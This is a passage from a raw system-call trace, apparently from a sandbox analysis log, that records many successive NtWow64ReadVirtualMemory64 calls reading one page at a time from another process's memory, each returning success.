NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5d000, Buffer=0x7ffb, BufferSize=0xb8d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.215] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5e000, Buffer=0x7ffb, BufferSize=0xb8e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.216] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b5f000, Buffer=0x7ffb, BufferSize=0xb8f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.216] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b60000, Buffer=0x7ffb, BufferSize=0xb90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b61000, Buffer=0x7ffb, BufferSize=0xb91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.217] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b62000, Buffer=0x7ffb, BufferSize=0xb92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b63000, Buffer=0x7ffb, BufferSize=0xb93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b64000, Buffer=0x7ffb, BufferSize=0xb94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.218] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b65000, Buffer=0x7ffb, BufferSize=0xb95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b66000, Buffer=0x7ffb, BufferSize=0xb96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.219] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b67000, Buffer=0x7ffb, BufferSize=0xb97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b68000, Buffer=0x7ffb, BufferSize=0xb98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b69000, Buffer=0x7ffb, BufferSize=0xb99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.220] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6a000, Buffer=0x7ffb, BufferSize=0xb9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xb9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xb9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.221] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xb9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.222] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xb9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.222] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xb9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.222] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xba0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.223] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xba1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.223] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xba2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.224] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xba3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.224] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xba4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.225] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xba5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.225] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xba6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.226] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xba7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.226] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xba8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.226] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xba9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.227] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xbaa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.227] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xbab000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.227] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xbac000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.228] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xbad000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.228] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xbae000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.228] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xbaf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xbb0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xbb1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.229] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xbb2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.230] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xbb3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.230] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xbb4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.230] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xbb5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.231] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xbb6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.231] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xbb7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.231] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xbb8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.232] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xbb9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.232] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xbba000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.233] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xbbb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.233] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xbbc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.233] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xbbd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xbbe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xbbf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xbc0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.234] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xbc1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.235] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xbc2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.235] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xbc3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.235] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xbc4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xbc5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xbc6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.236] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xbc7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xbc8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xbc9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.237] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xbca000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xbcb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.238] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xbcc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xbcd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xbce000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.239] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xbcf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xbd0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xbd1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.240] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xbd2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.241] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xbd3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.241] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xbd4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.241] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xbd5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xbd6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xbd7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xbd8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.242] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xbd9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xbda000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xbdb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.243] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xbdc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.244] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xbdd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.356] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xbde000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.356] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xbdf000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.357] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xbe0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.357] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xbe1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.357] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xbe2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.358] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xbe3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.358] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xbe4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.358] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xbe5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.359] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xbe6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.359] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xbe7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.359] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xbe8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.360] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xbe9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.360] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xbea000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.361] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xbeb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.361] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xbec000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.361] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xbed000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.362] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xbee000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.362] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xbef000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.362] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xbf0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.363] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xbf1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.363] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xbf2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.363] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xbf3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.364] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xbf4000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.364] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xbf5000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.364] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xbf6000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.365] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xbf7000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.365] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xbf8000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.366] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xbf9000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.366] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xbfa000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.367] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xbfb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.367] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xbfc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.367] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xbfd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.368] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xbfe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0140.368] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x174, 